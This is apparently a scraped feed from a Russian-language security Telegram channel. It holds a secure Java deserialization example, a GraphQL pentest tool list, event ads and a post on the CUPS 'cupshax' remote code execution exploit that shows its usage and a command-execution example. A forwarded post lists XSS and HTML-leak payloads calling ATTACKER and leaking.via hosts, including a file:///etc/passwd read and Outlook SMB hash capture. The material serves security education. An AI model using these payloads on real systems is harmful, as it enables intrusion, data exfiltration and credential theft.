Похек
16.6K subscribers
2.19K photos
114 videos
243 files
3.15K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
🖥 Basic Java Deserialization (2 part)

Теперь поговорим о том, как защищаться от десериализации


Пример безопасного кода:
import java.io.*;
import java.net.ServerSocket;
import java.net.Socket;
import java.util.HashSet;
import java.util.Set;

public class SecureServer {
private static final Set<String> ALLOWED_CLASSES = new HashSet<>();
static {
ALLOWED_CLASSES.add("java.lang.String");
ALLOWED_CLASSES.add("java.util.ArrayList");
}

public static void main(String[] args) {
try (ServerSocket serverSocket = new ServerSocket(1234)) {
System.out.println("Сервер запущен. Ожидание подключений...");
while (true) {
try (Socket clientSocket = serverSocket.accept();
ObjectInputStream ois = new ObjectInputStream(clientSocket.getInputStream()) {
@Override
protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
if (!ALLOWED_CLASSES.contains(desc.getName())) {
throw new InvalidClassException("Недопустимый класс", desc.getName());
}
return super.resolveClass(desc);
}
}) {

Object obj = ois.readObject();
System.out.println("Получен объект: " + obj);

} catch (Exception e) {
e.printStackTrace();
}
}
} catch (IOException e) {
e.printStackTrace();
}
}
}


Исправления:
➡️Создан белый список разрешенных классов (ALLOWED_CLASSES).
➡️Переопределен метод resolveClass для проверки классов перед десериализацией.
➡️Выбрасывается исключение при попытке десериализовать недопустимый класс.

Также есть другие практики по защите от десеров. К примеру Java SecurityManager, transient. С другой стороны вы можете закостылить защиту через сторонние библиотеки: SerialKiller, fastjson2, YamlBeans

➡️ В завершение хочу сказать, что если вы нашли у меня ошибку, напишите об этом, пожалуйста в комментариях)
➡️ А если вам понравилось и вы хотите продолжить изучение, то предлагаю почитать Java Deserialization Cheat Sheet

🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек
Please open Telegram to view this post
VIEW IN TELEGRAM
2🔥11👍21
Forwarded from Хакер — Xakep.RU
OAuth от и до. Ищем цепочки уязвимостей при атаках на авторизацию #статьи #подписчикам

Сегодня разберем мисконфиги OAuth, которые встречаются в дикой природе и хоть сами по себе безобидны, в определенных условиях могут иметь серьезные последствия — вплоть до похека админских аккаунтов. В этой сатье я покажу, как искать такие цепочки уязвимостей.

https://xakep.ru/2024/09/13/oauth-vuln-chains/
19
❗️ Как реагировать на атаки шифровальщиков: рекомендации для CISO ❗️
#ciso

Атаки вирусов-шифровальщиков остаются серьезной угрозой информационной безопасности компаний. От них не застрахованы даже корпорации с многоуровневыми системами защиты, целыми армиями ИБ-специалистов и арсеналами СЗИ.

Если корпоративная сеть подверглась такой атаке, ИБ-службе и CISO лучше поскорее подключить команду реагирования. Однако бизнес и штатные сотрудники службы безопасности могут самостоятельно снизить риск атак программ-вымогателей, дополнительно защитить критичные файлы и облегчить расследование, если избежать инцидента все же не удалось. Как именно? Рассказывает Семен Рогачев, руководитель отдела реагирования на инциденты Бастиона.

➡️ Читать далее

🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚52
Похек
⚡️Разыгрываем 10 книг "Сети глазами хакера" (в бумажном варианте): •  В книге рассматриваются вопросы безопасности компьютерных сетей, что делает ее очень полезной для экспертов по сетевой безопасности, пентестерам и даже системным администраторам! •  Всего…
🎉 Результаты розыгрыша:

Победители:
1. ooYa9ii (@Russian_OSlNT)
2. ALISHER (@megaumka)
3. Константин (@kr1pt0graf)
4. Babidshon (@BABIDSHON12)
5. Даниил (@by_dnk)
6. Алексей
7. Алексей (@lost_fany)
8. .Morty (@moortyyy)
9. Panteleevich (@Cracka1)
10. Anton (@TichoBrage)

Проверить результаты
🔥13👍5😁3
🔵 Инженер техподдержки? Получи оффер в YADRO всего за неделю!

У тебя есть возможность поучаствовать в One Week Offer от крупнейшей технологической компании России - лидера инженерной индустрии.

Если ты хорошо знаешь принципы серверной архитектуры и СХД и хочешь стать частью масштабных проектов:

• Пришли своё резюме и заполни форму участия до 22 сентября.
• Пройди техническое интервью.
• Получи оффер после успешного собеседования.

Скорее переходи по ссылке, оставляй заявку и стань частью команды.
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚11😁3
Forwarded from HaHacking
⚙️ #заметки #offense #web


➡️Cheat sheet по безопасности HTML5; (*от создателей DOMPurify)

   🧩 cure53/H5SC 💻 🧩 html5sec.org


▪️ [ html5sec.org/test/#<1...149> ]

Для каждого из почти 150 приведённых векторов XSS атак существует демо-стенд, где можно отредактировать полезную нагрузкупонаблюдать за её поведением внутри iframe'ов с различными DTD (HTML5, HTML4, XHTML);

▪️ [ html5sec.org/test.<ext> ]

Примеры файлов, содержащих полезную нагрузку для вызова alert(1), со следующими расширениями:
asf, avi, class, css, dtd, eml, evt, gif, hlp, hta, htc, html, jar, js, json, mpeg, pdf, sct, svg, swf, vbs, vml, wbxml, xbl, xdr, xml, xsl, xxe, zip


▪️vectors.txt Словарь с примерами пейлоадов для каждого вектора XSS атаки;



➡️Список примеров HTML элементов, которые могут инициировать запросы к ресурсам; (*тоже от создателей DOMPurify)

Может быть полезен как памятка для составления полезной нагрузки для эксплуатации возможности внедрения HTML кода: для реализации OOB запросов и эксфильтрации данных;

Или как чеклист для проверки, как там поживает Ваша анонимность, ведь именно по такому принципу работают, например, пиксели-трекеры в электронных письмах🐇

   🧩 cure53/HTTPLeaks


▪️ vectors.txt Список с примерами пейлоадов; Вот, например, несколько включений из него:
...
<img dynsrc="https://leaking.via/img-dynsrc">
<img lowsrc="https://leaking.via/img-lowsrc">
<video controls><source src="https://leaking.via/video-source-src" type="video/mp4"></video>
<style>@import url(https://leaking.via/css-import-url);</style>
<svg version="1.1" xmlns="http://www.w3.org/2000/svg"><rect cursor="url(https://leaking.via/svg-cursor),auto" /></svg>
<xml src="https://leaking.via/xml-src" id="xml"></xml>
<math xlink:href="https://leaking.via/mathml-math">CLICKME</math>
...


▪️ Несколько примеров из реальной жизни:
[Chrome]  Leak user html content using Dangling Markup injection when http upgrade to https

▪️ЧТО:       <img src="http://ATTACKER/?q=
▪️КОГДА:   HTTP➡️HTTPS для http://ATTACKER
▪️ИТОГ:      утечка содержимого страницы


[Proton]  User IP address leaked on email open

▪️ЧТО:       <svg><style>circle { background-image: url(https://ATTACKER/200); }</style><circle></circle></svg>

▪️КОГДА:  при открытии письма
▪️ИТОГ:      утечка IP адреса


[macOS]  This man thought opening a txt file is fine, he thought wrong

▪️ЧТО:
ℹ️ <!DOCTYPE HTML><html><head></head><body><style>@import{ "file:///net/ATTACKER/a.css"}</style></body></html>
ℹ️ <iframedoc src="file:///etc/passwd">

▪️КОГДА:  при открытии TXT файла в TextEdit
▪️ИТОГ:      DoS (например, подтянуть /dev/zero), утечка IP адреса + содержимого локальных файлов (*объединить пейлоады)


[MS Outlook]  SMB hash hijacking & user tracking

▪️ЧТО: <v:background xmlns_v="urn:schemas-microsoft-com:vml"><br><v:fill src="<strong>its:/ATTACKER/IDontExistNew/foobar</strong>"></v:fill><br></v:background>

▪️КОГДА:  при открытии письма
▪️ИТОГ:  внешние SMB / WebDAV запросы



@HaHacking 🐇
Please open Telegram to view this post
VIEW IN TELEGRAM
2👍18🔥53
🌐🌐

Без воды, только практика.
Без цензуры, только правда.
Всё, что вы хотели узнать из первых уст.


Мы запускаем серию подкастов

Рынок уязвимостей: как устроен рынок багбаунти в России | Эпизод 1

В первом эпизоде подкаста узнаем, чем сегодня живет «мир багбаунти» в России и исследуем, как эти программы трансформируют рынок кибербезопасности.
Обсудим, как компании используют багбаунти для повышения безопасности, какие ведущие платформы и инициативы существуют в России.

В гостях у Луки Сафонова
(основатель bugbounty.ru)

Андрей Левкин (Руководитель продукта BI.ZONE Bug Bounty) и
Анатолий Иванов (Руководитель платформы Standoff Bug Bounty)

Выбирайте, где смотреть

📺 YouTube

📱 VK

🔔RUTUBE

Полезные ссылки:
Standoff 360
Positive Technologies
BI.ZONE
BI.ZONE Bug Bounty
BugBountyRu
Киберполигон
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥164👍2😁1🌚1
Forwarded from Standoff 365
Хочешь получить доступ к приватным программам на платформе Standoff Bug Bounty?

Конечно хочешь. Вот короткая инструкция, что делать:

1️⃣ Перейди по ссылке и заполни небольшой опрос.

2️⃣ Попади в список из 50 счастливчиков с самыми классными навыками и опытом. Если пройдешь отбор, мы сразу же тебе напишем.

3️⃣ Ищи баги в свеженьком закрытом скоупе.

❗️ Важное условие: у тебя не должно быть ни одной приватной программы.

Еще читаешь? Бросай это дело — анкета сама себя не заполнит.
Please open Telegram to view this post
VIEW IN TELEGRAM
😁41
раздача приваток бб на спавне
😁16
Не забывайте отдыхать :)

p.s.p.s. завтра первый рабочий день в новой компании🌚

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3516👍2😁2👾1
VK Security Confab
#мероприятие

Ивент для AppSec, DevSecOps, разработчиков и в целом безопасников

🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥26👍2😁2
WAF-день в КиберДоме
#мероприятие

Открытая дисскусия "Развитие и тенденции WAF в России: будущее рынка"

🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍14😁73🔥21
Автоматизированный пентест GraphQL
#graphql #pentest

➡️GraphQL - это открытая технология для создания и взаимодействия с API. Она была создана в 2012 году как альтернативный подход к REST - архитектурному стилю, определяющему принципы взаимодействия клиента и сервера через HTTP-запросы, стандартизированные URL и форматы данных JSON и XML.

В отличие от REST API, где ответ на запрос приходит в формате JSON и требует дальнейшего анализа для извлечения нужной информации, GraphQL позволяет получить только необходимые данные за один запрос, даже если они распределены по разным источникам. Это делает GraphQL более эффективным и удобным методом извлечения данных по сравнению с REST.

➡️Основные преимущества GraphQL

▪️Не нужно создавать несколько REST-запросов. Чтобы извлечь данные, достаточно ввести один запрос.
▪️Не привязан к конкретной базе данных или механизму хранения.
▪️Используется целая система типов данных.

Более подробно можете ознакомиться в этом видео или в этой статье.

❤️ А теперь перейдём к самой вкусной части | Пентест GraphQL
Начнём с классики, это Hacktricks. Но это скучно)

Список тулз, которые рекомендуют в интернетах:
➡️graphw00f - тулза делает аудит на основе GraphQL Threat Matrix Project и после скана она выводит отчёт смапленный по этой матрице уязвимостей.
➡️InQL - довольно популярное расширение для BurpSuite, которое позволяет просканировать ендпоинты GraphQL, также можете загрузить json схему в него. Этот режим позволит собрать все эндпоинты в одну центролизованную кучку. Затем перекидываете конкретный эндпоинт во вкладку Attacker и там уже можете в ручном режиме изменять запрос.
➡️Куда же мы без ffuf и хорошего словаря для GraphQL
➡️GraphQL Cop - данная тулза подходит и для пентестеров, и для appsec/devsecops, т.к. очень легко заворачивается в CI/CD. Есть визуально красивый текстовый вывод в консоль, а есть Json вывод. Тулза обнаруживает атаки типа DOS, Раскрытие информации, CSRF. Но как говорится, где одна бага, там и вторая)
➡️Graphinder - добывает все graphql эндпоинты для конкретного домена
➡️GraphQLmap - интересный интерактивный режим. Пример работы
➡️Auto GraphQL Scanner - бурповское расширение по совету от Bo0om
➡️Два визуализатора схем GraphQL, GraphQL Voyager и GraphQL Online
➡️Уже все имплементировали nuclei в свои DAST, поэтому вот шаблон под детект GraphQL
➡️В случае если интроспекция выключена, используем Clairvoyance. Он соберёт для вас json схему.

⚠️ Типичные уязвимости для GraphQL

➡️DOS. GraphQL будут подвержены для этого типа атак, если нет ограничений на глубину запросов.
➡️Сбатченные (batched) запросы и алиасы. К примеру вы установили rate limit на ваши эндпоинты, НО если вы разрешили сбатченные запросы, то хахакер может впихнуть множество запросов в один и тем самым это приведет к DOS или к обходу рейтов.
➡️Некорректная или отсутствующая аутентификация и авторизация
➡️XSS
➡️Arbitrary File Upload & Path Traversal
➡️RCE

🛠 Лабы для тренировок

➡️Portswigger - не очень много тасков, нет прям сложных
➡️DVGA (Damn Vulnerable GraphQL Application) - самая популярная лаба
➡️vuln-graphql-api - малоизвестная лаба (сам ещё не раскатывал)

📌Почитать ещё

➡️Статья от ООО Бастион
➡️Pentesting GraphQL 101 Part 1 / 2 / 3
➡️GraphQL Pentesting for Dummies! Part- 1 / 2
➡️GraphQL Cheat Sheet
➡️Документация GraphQL

🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек
Please open Telegram to view this post
VIEW IN TELEGRAM
20🔥26👍103
Канал попал в ТОП ИБ каналов
#топ

➡️https://t.me/CyberSachok/2064
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4110👍6😁4
This media is not supported in your browser
VIEW IN TELEGRAM
Классическое ИБ афтерпати
#meme

🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек
Please open Telegram to view this post
VIEW IN TELEGRAM
37😁3🌚3
This media is not supported in your browser
VIEW IN TELEGRAM
🐧 Cupshax - RCE через службу печати в UNIX
#unix #RCE #CVE

CVE-2024-47176 CVE-2024-47076 CVE-2024-47175 CVE-2024-47177

Вчера вечером интернет наводнился новостью о новой баге в UNIX системах, которая позволяет выполнить неавторизованный RCE. Но были особые условия, к примеру что должна быть очередь на печать. В прикрепленном видосе демонстрируется PoC.

🛠 Изучить райтап ТУТ

Авторы эксплойта изучили коммит в OpenPrinting CUPS, в котором была исправлена бага и написали эксплойт. Он использует dns-sd обнаружение принтера, требуя, чтобы цель могла получить широковещательное сообщение, т.е. находилась в той же сети.

➡️Использование
usage: cupshax.py [-h] [--name NAME] --ip IP [--command COMMAND] [--port PORT]

A script for executing commands remotely

options:
-h, --help show this help message and exit
--name NAME The name to use (default: RCE Printer)
--ip IP The IP address of the machine running this script
--command COMMAND The command to execute (default: 'touch /tmp/pwn')
--port PORT The port to connect on (default: 8631)


➡️Пример использования
python cupshax.py --name "Print to PDF (Color)" \
--command "id>/tmp/pwn" \
--ip 10.0.0.3


📱 Github и мой форк, на случай удаления репы

🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек
Please open Telegram to view this post
VIEW IN TELEGRAM
11👍22🔥722
Ставьте плюс в комментах кто уже на underconf.ru и кто приедет ещё
😁6👍2
Forwarded from BugXplorer (j b)
🔥14👍321